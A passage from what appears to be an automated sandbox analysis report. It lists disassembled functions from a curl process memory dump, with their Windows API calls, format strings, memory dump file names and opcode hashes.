                                                                                                                                                                    • After %ldms connect time, move on!, xrefs: 001DDB41
                                                                                                                                                                    • connect to %s port %ld failed: %s, xrefs: 001DDC69
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$Count64Tick
                                                                                                                                                                    • String ID: After %ldms connect time, move on!$Failed to connect to %s port %ld: %s$connect to %s port %ld failed: %s
                                                                                                                                                                    • API String ID: 202284722-601300488
                                                                                                                                                                    • Opcode ID: 4a115693ccda5e129985ed521f7cc6b4f6006430cedf69ebb5f095b3743dd390
                                                                                                                                                                    • Instruction ID: 826b686b6b0d4699d6a661f30533c81b6a286424110ce3b9e96fbdb4a477e325
                                                                                                                                                                    • Opcode Fuzzy Hash: 4a115693ccda5e129985ed521f7cc6b4f6006430cedf69ebb5f095b3743dd390
                                                                                                                                                                    • Instruction Fuzzy Hash: 1551E271700702ABCB18DE28E885B6FB7A5BF95304F44422EF85A87381DB70E915CB92
                                                                                                                                                                    Function 002C80B4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 002C8F5F: EnterCriticalSection.KERNEL32(00000000,?,002C5D8A,0000000D), ref: 002C8F8A
                                                                                                                                                                    • GetStartupInfoW.KERNEL32(?,00307DE8,00000064), ref: 002C8147
                                                                                                                                                                    • GetFileType.KERNEL32(00000001), ref: 002C81DB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalEnterFileInfoSectionStartupType
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4158522439-0
                                                                                                                                                                    • Opcode ID: d9d7c661c94629a17d0e4dbc772cf02bf163c450eeb891123d6a599f0479507a
                                                                                                                                                                    • Instruction ID: ce2abc8bc531ec7544031a0aa29863ceac8ecc6c5b16266e705b6ed215f15030
                                                                                                                                                                    • Opcode Fuzzy Hash: d9d7c661c94629a17d0e4dbc772cf02bf163c450eeb891123d6a599f0479507a
                                                                                                                                                                    • Instruction Fuzzy Hash: BC81F471D246828FCB11CF68DC44BA9BBF0AF09324F24935ED4A6AB391CB749812CF51
                                                                                                                                                                    Function 001D0F90 Relevance: 6.1, APIs: 4, Instructions: 130sleepnetworkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 001D0FB2
                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 001D100B
                                                                                                                                                                    • WSASetLastError.WS2_32(00002726,00000000,?,000003E8,00000000,?,?,?,?,?,?,?,?,?,001D11AC), ref: 001D1077
                                                                                                                                                                    • Sleep.KERNELBASE(000003E8,00000000,?,000003E8,00000000,?,?,?,?,?,?,?,?,?,001D11AC), ref: 001D10E5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Count64Tick$ErrorLastSleep
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2458332380-0
                                                                                                                                                                    • Opcode ID: 2fbc33eb284a58d1722b7a6623501f3e2d6769b2e98e2565af648d1e84f0b1eb
                                                                                                                                                                    • Instruction ID: dc1b5ecb1124969a47d3842e2d296c57d62e4ee32eb767f1825db2431b988ace
                                                                                                                                                                    • Opcode Fuzzy Hash: 2fbc33eb284a58d1722b7a6623501f3e2d6769b2e98e2565af648d1e84f0b1eb
                                                                                                                                                                    • Instruction Fuzzy Hash: B2411332E002116BC729AA28D88576F7399EBC4720F15423FF8499B381EB24DE4AC7D1
                                                                                                                                                                    Function 001D3CB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • send.WS2_32(?,00000000,00000000,00000000), ref: 001D3CCD
                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 001D3CE4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastsend
                                                                                                                                                                    • String ID: Send failure: %s
                                                                                                                                                                    • API String ID: 1802528911-857917747
                                                                                                                                                                    • Opcode ID: fa8ad4661b014fbf50a30f4543bc057312132962ff8925034f4dd2ff4c4147ab
                                                                                                                                                                    • Instruction ID: f3f926fd91a17986257803aa7c2cdceb1d2dc5be0c39c97c1107c9c6c9de634a
                                                                                                                                                                    • Opcode Fuzzy Hash: fa8ad4661b014fbf50a30f4543bc057312132962ff8925034f4dd2ff4c4147ab
                                                                                                                                                                    • Instruction Fuzzy Hash: FE01D176705204AFCB105FA9EC48B9ABBE5FB88726F104176F95C93390C7329D209F41
                                                                                                                                                                    Function 002085F0 Relevance: 4.6, APIs: 3, Instructions: 132networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • getaddrinfo.WS2_32(?,?,?,?), ref: 0020860B
                                                                                                                                                                    • freeaddrinfo.WS2_32(?,?,?,?,?,?,?,?,00000000), ref: 00208710
                                                                                                                                                                    • WSASetLastError.WS2_32(00002AF9,?,?,?,?,?,?,?,00000000), ref: 0020876E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastfreeaddrinfogetaddrinfo
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1817844550-0
                                                                                                                                                                    • Opcode ID: c50d88765b518b9d66a2272f7938f50050d96f4b26e0ddbc6fdb61cd158a768d
                                                                                                                                                                    • Instruction ID: 057378dca3abc816d97f4e6ff4fa5e66c0bd640473a0ab0c7f224b809fd8649a
                                                                                                                                                                    • Opcode Fuzzy Hash: c50d88765b518b9d66a2272f7938f50050d96f4b26e0ddbc6fdb61cd158a768d
                                                                                                                                                                    • Instruction Fuzzy Hash: 67419D746107069FC720DF29E984A17FBF8FF54700F118929E895C32A2DB75E968CB92
                                                                                                                                                                    Function 002C3646 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Thread$CurrentErrorExitLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3034690753-0
                                                                                                                                                                    • Opcode ID: 421e0b6727c3fa912b9a710d0f3101829a52e916c404fdb17290badbaade82aa
                                                                                                                                                                    • Instruction ID: 4fb8567da390759702ed0314d60ed1b5d11d6faf2d48b8b58b4ef12a831cbfe0
                                                                                                                                                                    • Opcode Fuzzy Hash: 421e0b6727c3fa912b9a710d0f3101829a52e916c404fdb17290badbaade82aa
                                                                                                                                                                    • Instruction Fuzzy Hash: CE016275825B11ABC721EF74D80AE4A7BE8AF493547204A1DF845CB301EB34ED55CF94
                                                                                                                                                                    Function 001DD530 Relevance: 4.5, APIs: 3, Instructions: 38networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SleepEx.KERNELBASE ref: 001DD54D
                                                                                                                                                                    • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000000), ref: 001DD568
                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 001DD572
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastSleepgetsockopt
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3033474312-0
                                                                                                                                                                    • Opcode ID: 8034ecaede4ffcf62f70df561e002c9448de7bfefb1169de1e850431500ca8cb
                                                                                                                                                                    • Instruction ID: ce16123358e04e92ae2a1a495931ed7ebc6c3217caa3f6cd7c4095ea89fd5808
                                                                                                                                                                    • Opcode Fuzzy Hash: 8034ecaede4ffcf62f70df561e002c9448de7bfefb1169de1e850431500ca8cb
                                                                                                                                                                    • Instruction Fuzzy Hash: DCF0F0B1108302BBE7209F14FC49BA77BF8AF80708F24412BF549C6390D774C8088BA2
                                                                                                                                                                    Function 001CC720 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104), ref: 001CC783
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                                                                                    • String ID: COLUMNS
                                                                                                                                                                    • API String ID: 237503144-2475376301
                                                                                                                                                                    • Opcode ID: 6800c1df658c75d609196fa10383f1bc073ff2cd6721f22002b24cb3cedafa9e
                                                                                                                                                                    • Instruction ID: a33837dee9ca725413ae96d354e3e3bebf6d9c6348741f13fda5f32658ae0c91
                                                                                                                                                                    • Opcode Fuzzy Hash: 6800c1df658c75d609196fa10383f1bc073ff2cd6721f22002b24cb3cedafa9e
                                                                                                                                                                    • Instruction Fuzzy Hash: 4F3193719043428FD325DF24D885BA6B7E8EFA9300F144A2EE88982252E775DD49CFD2
                                                                                                                                                                    Function 002C34E6 Relevance: 3.1, APIs: 2, Instructions: 61threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,0000000C,Function_00103646,00000000,00000000,001DF1F2), ref: 002C3554
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 002C355E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
